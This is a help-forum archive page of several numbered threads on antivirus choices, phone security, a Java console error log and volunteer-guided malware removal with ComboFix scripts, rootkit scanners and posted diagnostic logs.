3251.

Solve : defense system?

Answer»

Hello
What is the best integrated defense system that can be installed on the computer? (Of course I do not mean the Patriots.)

Well, if you use Windows then I would suggest Avast, Malwarebytes, and SuperantiSpyware.

There is no best. Pick a good anti virus app (there are plenty from which to choose), supplement it with Spyware Blaster and either MalwareBytes or Super AntiSpyware (or both), and most important, practice "SMART computing". If you don't use a router with a built in NAT you should also use a firewall - either the one provided by Windows or a 3rd party app.

3252.

Solve : Anti Virus for Mobile Phones?

Answer»

Hi - you guys have helped me enormously with my computers. I don't have a mobile phone and know nothing about 'em - other than that apps look like a lot of fun.

My Mum has just bought a Samsung Galaxy ACE with Android 2.2.

I've been browsing the Android Market from my PC and have seen some free anti-virus programs there.

Should she get some protection installed as soon as possible?

no

Quote from: Allan on July 09, 2011, 11:55:46 AM

no

Why not ?? What would it hurt ??

http://www.bbc.co.uk/news/technology-10928070

http://www.ibtimes.com/articles/100133/20110112/google-android-smartphones-mobile-devices-apple-ios-software-malware-virus-hackers-security-trojan-a.htm

Phone viruses are rare and for the moment mostly limited to non-US phones
They are not proven to do anything useful
They are a drag on the system
If you don't download or install crap on the phone there is zero danger regardless of where you are

Fair enough...........SMART phoning as well as smart computing, eh?

Installing an Anti-virus on a phone is sort of like installing an Anti-virus on a *nux machine. It's pointless because the systems aren't a target for malware. (not because "Unix is inherently secure").

It's like taking a duvet into a Sauna in case you get the shivers. People just look at you weird and you ruin a duvet.

3253.

Solve : email address query?

Answer»

If I go on to a forum which is one of those where you have to be a member to read it, can the web site tell my email address even though I only looked at their home page and I am not a member??

No.

3254.

Solve : What does this Java message mean??

Answer»

I was watching an online movie and it popped up and I notice in the message there's a lot of "permission denied." What was denied?

Java Plug-in 1.6.0_26
Using JRE version 1.6.0_26-b03 Java HotSpot(TM) Client VM
User home directory = C:\Users\Doug

----------------------------------------------------
c: clear console window
f: finalize objects on finalization queue
g: garbage collect
h: display this help message
l: dump classloader list
m: print memory usage
o: trigger logging
q: hide console
r: reload policy configuration
s: dump system and deployment properties
t: dump thread list
v: dump thread stack
x: clear classloader cache
0-5: set trace level to
----------------------------------------------------

exception: Permission denied: file:D:/Program%20Files/Java/jre6/lib/ext/.
java.lang.SecurityException: Permission denied: file:D:/Program%20Files/Java/jre6/lib/ext/
exception: Permission denied: file:E:/Program%20Files/Java/jre6/lib/ext/.
at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
Exception: java.lang.SecurityException: Permission denied: file:D:/Program%20Files/Java/jre6/lib/ext/
java.lang.SecurityException: Permission denied: file:E:/Program%20Files/Java/jre6/lib/ext/
at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
Exception: java.lang.SecurityException: Permission denied: file:E:/Program%20Files/Java/jre6/lib/ext/
exception: Permission denied: file:C:/Program%20Files%20(x86)/Java/jre6/lib/ext/.
java.lang.SecurityException: Permission denied: file:C:/Program%20Files%20(x86)/Java/jre6/lib/ext/
at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
Exception: java.lang.SecurityException: Permission denied: file:C:/Program%20Files%20(x86)/Java/jre6/lib/ext/
exception: Permission denied: file:D:/Program%20Files%20(x86)/Java/jre6/lib/ext/.
java.lang.SecurityException: Permission denied: file:D:/Program%20Files%20(x86)/Java/jre6/lib/ext/
at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
Exception: java.lang.SecurityException: Permission denied: file:D:/Program%20Files%20(x86)/Java/jre6/lib/ext/
exception: Permission denied: file:C:/Program%20Files/Java/jre6/lib/ext/.
java.lang.SecurityException: Permission denied: file:C:/Program%20Files/Java/jre6/lib/ext/
at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown Source)
exception: Permission denied: file:E:/Program%20Files%20(x86)/Java/jre6/lib/ext/.
at java.lang.Thread.run(Unknown Source)
Exception: java.lang.SecurityException: Permission denied: file:C:/Program%20Files/Java/jre6/lib/ext/
java.lang.SecurityException: Permission denied: file:E:/Program%20Files%20(x86)/Java/jre6/lib/ext/
at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
Exception: java.lang.SecurityException: Permission denied: file:E:/Program%20Files%20(x86)/Java/jre6/lib/ext/

3255.

Solve : Results of Hijack This scan?

Answer»

Quote

You sort of ended your last message with an instructional sentence without the instruction. I'll wait until I read your next message.
Sorry about that. I meant try to run the SREng program after running RKill.

Tried to run all seven of them. Each one came up with the pop-up window Open With which showed about 20 programs starting with Adobe Acrobat. Frank C.

Please try booting in Safe mode and run the SReng program.

OK, there was one error, I think it was the .VBS item when I ran SREngLdr.EXE in Safe Mode. A pop up came up referring to Microsoft Security Essentials and asked me if I wanted to delete the program and for some odd reason I indicated Yes this time whereas before I indicated No. Now I have not been able to download, well MS Sec.Essen. did finally download to my desktop but now as with the other programs previously the Open With pop up screen appears, so MS Sec. Essen. will not run. I have the Windows Firewall turned on but cannot get MS Sec. Essen. to install again. I tried everything-turning the computer off/on, trying to download from another User, etc.

I was then able to download and run ComboFix before I had the above trouble with MS Sec. Essen. but was not able to transfer the CFScript.txt to it before ComboFix ran. I tried to "Save As" ComboFix to the desktop so as to transfer, copy, paste Cfscript.txt into it before running ComboFix but ComboFix took off on its own and ran and went through the whole scan automatically. Here is the text from the ComboFix Scan.

Well, at least all that came off ok. I could try installing MS Sec. Essen. in Safe Mode. What if I tried downloading/installing/running SREngLdr.EXE from Safe Mode or from regular mode again? Maybe MS Sec. Essen. would start installing/running then.
I'll wait to hear from you. Frank C.

Quote
Well, at least all that came off ok. I could try installing MS Sec. Essen. in Safe Mode.
According to the CF log, MSE is installed and updated. Just make sure that it's activated. If it isn't, you will get a warning in the lower right-hand corner of your desktop that your security is at risk.
I have one more script for you to run. Just follow the instructions. There's no copy and paste. Just drag the file into ComboFix.

Re-running ComboFix to remove infections:

  • Close any open browsers.
  • Close/disable all anti-virus and anti-malware programs so they do not interfere with the running of ComboFix.
  • Open Notepad and copy/paste the text in the quotebox below into it:
    Quote
    KillAll::

    File::
    c:\windows\system32\906D.tmp
    c:\windows\system32\41FF.tmp
    c:\windows\system32\EFA6.tmp
    c:\windows\system32\C55B.tmp
    Folder::

  • Save this as CFScript.txt, in the same location as ComboFix.exe



  • Referring to the picture above, drag CFScript into ComboFix.exe
  • When finished, it shall produce a log for you at C:\ComboFix.txt
  • Please post the contents of the log in your next reply.
********************************************************
Please try to run the ESET scan as instructed in Reply # 20 and post the log.

Here is ComboFix. I tried MS Sec. Essen. Still is not listed in Start Menu and cannot download it from Microsoft Site. I'll try running ESET as soon as this reply is done. Now for some reason my sound does not work although I can find nothing wrong.


ComboFix 11-06-30.03 - Frank C 06/30/2011 21:39:40.4.8 - x64
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.4091.2657 [GMT -4:00]
Running from: c:\users\Frank C\Desktop\ComboFix.exe
Command switches used :: c:\users\Frank C\Desktop\CFScript.txt
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
FILE ::
"c:\windows\system32\41FF.tmp"
"c:\windows\system32\906D.tmp"
"c:\windows\system32\C55B.tmp"
"c:\windows\system32\EFA6.tmp"
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\windows\system32\41FF.tmp
c:\windows\system32\906D.tmp
c:\windows\system32\C55B.tmp
c:\windows\system32\EFA6.tmp
.
.
((((((((((((((((((((((((((((((((((((((( Drivers/Services )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
-------\Service_MEMSWEEP2
.
.

S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe

S2 KTbWorksService;Kensington TrackballWorks Service;c:\program files (x86)\Kensington TrackballWorks\KTbWorksS.exe [2010-07-01 50256]
S2 OS Selector;Acronis OS Selector activator;c:\program files (x86)\Acronis\DiskDirector\OSS\reinstall_svc.exe [2010-09-29 2139400]
S2 Smart TimeLock;Smart TimeLock Service;c:\program files (x86)\GIGABYTE\Smart6\Timelock\TimeMgmtDaemon.exe [2009-10-13 114688]
S3 amdkmdag;amdkmdag;c:\windows\system32\DRIVERS\atikmdag.sys

S3 amdkmdap;amdkmdap;c:\windows\system32\DRIVERS\atikmpag.sys

S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys

.
.
Contents of the 'Scheduled Tasks' folder
.
2011-07-01 c:\windows\Tasks\FixCleaner Startup.job
- c:\program files (x86)\FixCleaner\FixCleaner.exe [2011-06-01 18:33]
.
2011-06-28 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3224318273-3311775750-3685103505-1000Core.job
- c:\users\Frank C\AppData\Local\Google\Update\GoogleUpdate.exe [2010-07-07 02:58]
.
2011-07-01 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3224318273-3311775750-3685103505-1000UA.job
- c:\users\Frank C\AppData\Local\Google\Update\GoogleUpdate.exe [2010-07-07 02:58]
.
.
--------- x86-64 -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"combofix"="c:\combofix\CF840.cfxxe" [X]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2010-01-19 9996320]
"MacroKeyManager"="WTMKM.exe" [2009-05-21 5594272]
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.excite.com/
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride =
TCP: DhcpNameServer = 192.168.2.1 192.168.2.1
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-Locked - (no file)
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil10s_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil10s_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash10s.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.10"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash10s.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash10s.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash10s.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}]
@Denied: (A 2) (Everyone)
@="IFlashBroker4"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
------------------------ Other Running Processes ------------------------
.
c:\program files (x86)\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
c:\program files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
c:\program files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
c:\program files (x86)\Common Files\Microsoft Shared\Ink\TabTip32.exe
.
**************************************************************************
.
Completion time: 2011-06-30 21:49:33 - machine was rebooted
ComboFix-quarantined-files.txt 2011-07-01 01:49
ComboFix2.txt 2011-06-28 17:49
ComboFix3.txt 2011-06-16 14:12
.
Pre-Run: 441,730,760,704 bytes free
Post-Run: 441,197,662,208 bytes free
.
- - End Of File - - 1FC31389D708BFFA6EAC8EA99E20EC6A

I'll not try ESET in another post.
Frank C.

I tried ESET. To get some type of response I had to right click the Download button and select Copy Shortcut and Paste it into the address bar. But that did not work. I was just taken back to the same page. So I was not able to download ESET.
Frank C.
Ok. Let's try this one.

Run the BitDefender Online scanner

Agree to the license and then select Scan. DO NOT CHANGE THE OPTIONS TO SHOW ALL FILES SCANNED. That will make your logs huge and we don't need to see clean files.

Once Bitdefender completes the scan:
Click-on the Detected Problems tab.
Then select Click here to export the scan report.

When the window comes up to save the report, change the Save as type: box to:
Text (Tab Delimited) (*.txt) and then in the File name box enter change to bdscan then click Save.

This will save a file named bdscan.txt. I would suggest saving it to the Desktop so you can easily find it. (take notice of where you save it so you can find it later).
This bdscan.txt file will actually contain HTML code that we can easily view later while reviewing your log. All we have to do is rename the file to bdscan.html.

If you do not follow these steps, you will have an incorrect log or worse a log summary which is useless to us.

Post the bdscan.txt file as an Attachment.
Won't run. A big black top margin box appears with a big green arrow pointing to the Home icon and the Panning Hand icon but there is no browser confirmation message the green arrow is supposed to be pointing towards. There is a notice that the BitDefender Quick Scan is running but I let it run for over an hour and nothing is happening. I would guess it's waiting for me to click on the browser confirmation message.
Frank C.
Let's try this one.

Please go to Kaspersky website and perform an online antivirus scan.

1. Read through the requirements and privacy statement and click on Accept button.
2. It will start downloading and installing the scanner and virus definitions. You will be prompted to install an application from Kaspersky. Click Run.
3. When the downloads have finished, click on Settings.
4. Make sure these boxes are checked (ticked). If they are not, please tick them and click on the Save button:
Spyware, Adware, Dialers, and other potentially dangerous programs
Archives


5. Click on My Computer under Scan.
6. Once the scan is complete, it will display the results. Click on View Scan Report.
7. You will see a list of infected items there. Click on Save Report As....
8. Save this report to a convenient place. Change the Files of type to Text file (.txt) before clicking on the Save button.
9. Please post this log in your next reply along with a fresh HijackThis log.
3256.

Solve : yofee.9966.org?

Answer»

Hello CH Experts,

This is from my work (but out-of-scope from my job responsibility) and need to consult you something. Please see attached screen-shot. According to my client, when they restart their database server (Windows 2003 Server), a command prompt opens automatically. This is very strange and just happened today. And I found out also that they don't have any anti-virus installed.

I advised them to consult their local IT about it and install anti-virus program, so from there, they may have an idea what it caused.

But out of curiosity, what the h3ll is this yofee.9966.org?

[recovering disk space - old attachment deleted by admin]

A quick search on google hong kong version turns up that it is a Chinese virus, a trojan horse that relies on FTP connections to download malware.

Translated to English

3257.

Solve : trojan program evades norton?

Answer»

I keep getting a trojan program that Norton only seems to stop about 50% of the time. It asks you if you want to have your PC checked for viruses.
If you click on X, it continues and shows you it is checking all your files. If you accept it, it will take over your pc and show you how to buy an antivirus program.

I had to reload my system to get rid of it.

If you keep checking X sometimes you can stop it.
thanks for the help

How did you "reload your system"?

3258.

Solve : worms in my computer?

Answer»

Re-running ComboFix to remove infections:

  • Close any open browsers.
  • Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.
  • Open notepad and copy/paste the text in the quotebox below into it:
    Quote
    KillAll::

    File::

    c:\windows\DUMP78e9.tmp
    c:\windows\DUMP74e1.tmp

    DDS::
    Trusted Zone: bcnonline.com\www

  • Save this as CFScript.txt, in the same location as ComboFix.exe



  • Referring to the picture above, drag CFScript into ComboFix.exe
  • When finished, it shall produce a log for you at C:\ComboFix.txt
  • I don't need to see the log from this action.
*************************************************
SysProt Antirootkit

Download SysProt Antirootkit from the link below (you will find it at the bottom of the page under attachments, or you can get it from one of the mirrors).

http://sites.google.com/site/sysprotantirootkit/

Unzip it into a folder on your desktop.
  • Double click Sysprot.exe to start the program.
  • Click on the Log tab.
  • In the Write to log box select the following items.
    • Process << Selected
    • Kernel Modules << Selected
    • SSDT << Selected
    • Kernel Hooks << Selected
    • IRP Hooks << NOT Selected
    • Ports << NOT Selected
    • Hidden Files << Selected
  • At the bottom of the page
    • Hidden Objects Only << Selected
  • Click on the Create Log button on the bottom right.
  • After a few seconds a new window should appear.
  • Select Scan Root Drive. Click on the Start button.
  • When it is complete a new window will appear to indicate that the scan is finished.
  • The log will be saved automatically in the same folder Sysprot.exe was extracted to. Open the text file and copy/paste the log here.
After doing the CFScript and the SysProt, and after the smoke cleared, I am looking for the text file. At first it seemed to tell me there was nothing found....poking around I found this.
MZ? ÿÿ ? @ P º ?Í!?LÍ!This program cannot be run in DOS mode.
The main body of this log was deleted by myself, Dave.
It's all Greek to me........ the SysProt ran fine ( I think) did I miss something?
Quote
MZ? ÿÿ ? @ P º ? Í!?LÍ!This program cannot be run in DOS mode. $

Did you follow the instructions? It states that you cannot run this in DOS mode.

I did not run it in DOS, I am not nearly that smart, I ran it like I was instructed. Here is something I found on the desktop at the end of the day.
# Archive C:\Documents and Settings\gne\Escritorio\SysProt.zip
2009-03-15 23:11 Folder Folder SysProt
2009-03-15 20:18 145408 139772 SysProt\SysProt.exe
2009-03-15 23:10 268146 214248 SysProt\SysProt_AntiRootkit_Help.pdf
#
# TOTAL Size Packed Files
# 413554 354020 3

Ok. Let's just forget about this scanner and we'll try another.

* Download the following tool: RootRepeal - Rootkit Detector
* Direct download link is here: RootRepeal.zip

* Close all programs and temporarily disable your anti-virus, Firewall and any anti-malware real-time protection before performing a scan.
* Click this link to see a list of such programs and how to disable them.

* Extract the program file to a new folder such as C:\RootRepeal
* Run the program RootRepeal.exe and go to the REPORT tab and click on the Scan button.
* Select ALL of the checkboxes and then click OK and it will start scanning your system.
* If you have multiple drives you only need to check the C: drive or the one Windows is installed on.
* When done, click on Save Report
* Save it to the same location where you ran it from, such as C:\RootRepeal
* Save it as rootrepeal.txt
* Then open that log and select all and copy/paste it back on your next reply please.
* Close RootRepeal.
3259.

Solve : Need help removing virus/malware/spyware...?

Answer»

Dave,

I completed the steps you instructed ComboFix did run, where do I go to obtain the scan report? Do I need to or was this the last step?

Quote

I completed the steps you instructed ComboFix did run, where do I go to obtain the scan report? Do I need to or was this the last step?
You can go to your C drive and look in the Combo-Fix folder and look for the combo-fix.txt file. Or, you can just do a search for combo-fix.txt. I need to see this log.
3260.

Solve : No virus but Combo log attached just in case?

Answer»

No panic.
MBAM has recently been ballooning various messages saying it is blocking incoming ip sites from access, so it is doing its job!
To be on the safe side I've just run Avast AV, HJTHIS, SAS, and MBAM scans and all run clean, with no errors showing.
Can't remember where, but I read that running Combofix also solves some problems. Googled it and it seems a powerful program but I couldn't see why I shouldn't run it, as long as I didn't attempt to correct anything myself, without help from yourselves.
Here's the "blimmin" long log from Combo. Would someone be kind enough to have a quick glance and see if you think I have any issues that need resolving?
NB: I noticed mentions somewhere in there of AVG and IOBIT but I thought I had deleted these?
Anyway, thank you.

ComboFix 11-06-15.01 - briann 15/06/2011 17:41:19.1.1 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.3327.2726 [GMT 2:00]
Running from: c:\documents and settings\briann\Desktop\ComboFix.exe
AV: avast! Antivirus *Disabled/Updated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
AV: Microsoft Security Essentials *Disabled/Updated* {BCF43643-A118-4432-AEDE-D861FCBCFCDF}
FW: AVG Firewall *Disabled* {8decf618-9569-4340-b34a-d78d28969b66}
.
ADS - WINDOWS: deleted 24 bytes in 1 streams.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\documents and settings\briann\Application Data\briannlog.dat
c:\documents and settings\briann\Application Data\EurekaLog
c:\documents and settings\briann\Application Data\inst.exe
c:\documents and settings\briann\Application Data\OfferBox
c:\documents and settings\briann\Application Data\OfferBox\config.xml
c:\documents and settings\briann\WINDOWS
.
.
((((((((((((((((((((((((( Files Created from 2011-05-15 to 2011-06-15 )))))))))))))))))))))))))))))))
.
.
2011-06-15 06:11 . 2011-06-15 06:11--------d-----w-c:\windows\LastGood
2011-06-12 22:56 . 2011-06-12 22:56--------d-----w-c:\documents and settings\All Users\Application Data\IObit
2011-06-12 22:55 . 2011-06-12 22:57--------d-----w-c:\documents and settings\briann\Application Data\IObit
2011-06-11 22:28 . 2011-06-11 22:28--------d-----w-c:\documents and settings\briann\Application Data\SUPERAntiSpyware.com
2011-06-11 22:28 . 2011-06-11 22:28--------d-----w-c:\program files\SUPERAntiSpyware
2011-06-11 06:05 . 2011-06-11 06:05404640----a-w-c:\windows\system32\FlashPlayerCPLApp.cpl
2011-06-07 17:44 . 2011-06-07 17:44--------d-----w-c:\documents and settings\briann\Application Data\Rovio
2011-06-06 09:22 . 2011-05-10 12:03307928----a-w-c:\windows\system32\drivers\aswSP.sys
2011-06-06 09:22 . 2011-05-10 11:5919544----a-w-c:\windows\system32\drivers\aswFsBlk.sys
2011-06-06 09:22 . 2011-05-10 12:03441176----a-w-c:\windows\system32\drivers\aswSnx.sys
2011-06-06 09:22 . 2011-05-10 12:0249240----a-w-c:\windows\system32\drivers\aswTdi.sys
2011-06-06 09:22 . 2011-05-10 11:5925432----a-w-c:\windows\system32\drivers\aswRdr.sys
2011-06-06 09:22 . 2011-05-10 12:02102616----a-w-c:\windows\system32\drivers\aswmon2.sys
2011-06-06 09:22 . 2011-05-10 12:0296344----a-w-c:\windows\system32\drivers\aswmon.sys
2011-06-06 09:22 . 2011-05-10 11:5930808----a-w-c:\windows\system32\drivers\aavmker4.sys
2011-06-06 09:22 . 2011-05-10 12:1040112----a-w-c:\windows\avastSS.scr
2011-06-06 09:22 . 2011-05-10 12:10199304----a-w-c:\windows\system32\aswBoot.exe
2011-06-06 09:22 . 2011-06-06 09:22--------d-----w-c:\program files\AVAST Software
2011-06-05 21:48 . 2011-06-05 21:48--------d-----w-c:\documents and settings\briann\Application Data\A0261641-01B1-467E-9DE5-2FFFBF73C059
2011-06-02 19:02 . 2011-06-02 19:02--------d-----w-c:\documents and settings\briann\Application Data\AVG10
2011-06-02 19:00 . 2011-06-02 19:00--------d--h--w-c:\documents and settings\All Users\Application Data\Common Files
2011-06-02 18:49 . 2011-06-04 20:27--------d-----w-c:\documents and settings\All Users\Application Data\AVG10
2011-06-02 18:48 . 2011-06-04 20:27--------d-----w-c:\documents and settings\All Users\Application Data\MFAData
2011-05-29 17:25 . 2011-05-29 17:25--------d-----w-C:\DVDVideoSoft
2011-05-19 15:46 . 2011-05-19 15:46--------d-----w-c:\windows\system32\wbem\Repository
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2011-06-05 21:48 . 2011-05-08 21:19167968----a-w-c:\windows\system32\drivers\afcdp.sys
2011-06-05 21:48 . 2011-05-08 21:19752128----a-w-c:\windows\system32\drivers\tdrpm273.sys
2011-06-05 21:48 . 2011-01-24 18:32600928----a-w-c:\windows\system32\drivers\timntr.sys
2011-05-29 07:11 . 2010-10-06 15:0739984----a-w-c:\windows\system32\drivers\mbamswissarmy.sys
2011-05-29 07:11 . 2010-10-06 15:0722712----a-w-c:\windows\system32\drivers\mbam.sys
2011-05-08 21:19 . 2011-01-24 18:32170528----a-w-c:\windows\system32\drivers\snapman.sys
2011-03-30 18:38 . 2011-03-30 18:3828752----a-w-c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{E3544FD3-0E42-4B6D-875F-784AE3705A58}\MpKsla6a28098.sys
2011-03-30 18:32 . 2011-03-30 18:3228752----a-w-c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{E3544FD3-0E42-4B6D-875F-784AE3705A58}\MpKsl09f40d0c.sys
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00avast]
@="{472083B0-C522-11CF-8763-00608CC02F24}"
[HKEY_CLASSES_ROOT\CLSID\{472083B0-C522-11CF-8763-00608CC02F24}]
2011-05-10 12:10122512----a-w-c:\program files\AVAST Software\Avast\ashShell.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2010-10-29 249064]
"Malwarebytes' Anti-Malware"="c:\program files\Malwarebytes' Anti-Malware\mbamgui.exe" [2011-05-29 449584]
"avast"="c:\program files\AVAST Software\Avast\avastUI.exe" [2011-05-10 3459712]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableLinkedConnections"= 1 (0x1)
.
[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= "c:\program files\SUPERAntiSpyware\SASSEH.DLL" [2008-05-13 77824]
.
[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk]
backup=c:\windows\pss\HP Digital Imaging Monitor.lnkCommon Startup
.
[HKLM\~\startupfolder\C:^Documents and Settings^briann^Start Menu^Programs^Startup^Secunia PSI.lnk]
backup=c:\windows\pss\Secunia PSI.lnkStartup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Acronis Scheduler2 Service]
2011-02-01 17:53390720----a-w-c:\program files\Common Files\Acronis\Schedule2\schedhlp.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\C-Media Mixer]
2002-10-15 16:001818624----a-w-c:\windows\mixer.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HP Software Update]
2007-10-14 19:1749152----a-w-c:\program files\HP\HP Software Update\hpwuSchd2.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\hpqSRMon]
2008-08-20 09:54150016----a-w-c:\program files\HP\Digital Imaging\bin\HpqSRmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MSMSGS]
2008-04-14 12:421695232--sh--w-c:\program files\Messenger\msmsgs.exe
.
